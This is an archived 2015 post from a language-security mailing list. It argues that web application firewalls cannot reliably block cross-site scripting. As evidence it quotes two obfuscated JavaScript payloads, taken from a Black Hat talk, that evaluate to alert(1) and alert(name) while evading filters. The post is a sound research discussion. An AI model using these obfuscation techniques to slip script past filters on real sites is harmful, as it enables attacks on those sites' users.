[langsec-discuss] turing-completeness & the impossibility of stopping XSS with WAF

travis+ml-langsec at subspacefield.org travis+ml-langsec at subspacefield.org
Fri Feb 6 23:44:03 UTC 2015


I don't normally post stuff like this, but since it's already published and salient:

https://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf

For example, this evaluates to alert(1):

($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

And this evaluates to alert(name):

__=''
$$=__+'e'
__=__+'__par'
_=$$+'val'
x=1+[]
z=$$+'nt__'
x=x[__+z]
x=x[_]
y=x('nam'+$$)
x(y)
'abc(def)ghi(jkl)mno(pqr)abc(def)abc(def)...' 

Oh dear.

Now, I know we can't solve the halting problem, but I wonder if you
can restrict tricky things that make it hard to reason about the data,
and how much that would affect real-world programs involving TC
languages.  Conversely, could you cripple the run-time behavior by
removing hard-to-reason-about primitives like eval and still process
most things safely?
-- 
http://www.subspacefield.org/~travis/
Split a packed field and I am there; parse a line of text and you will find me.






-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 834 bytes
Desc: not available
URL: <https://mail.langsec.org/pipermail/langsec-discuss/attachments/20150206/aca00a8d/attachment.sig>


More information about the langsec-discuss mailing list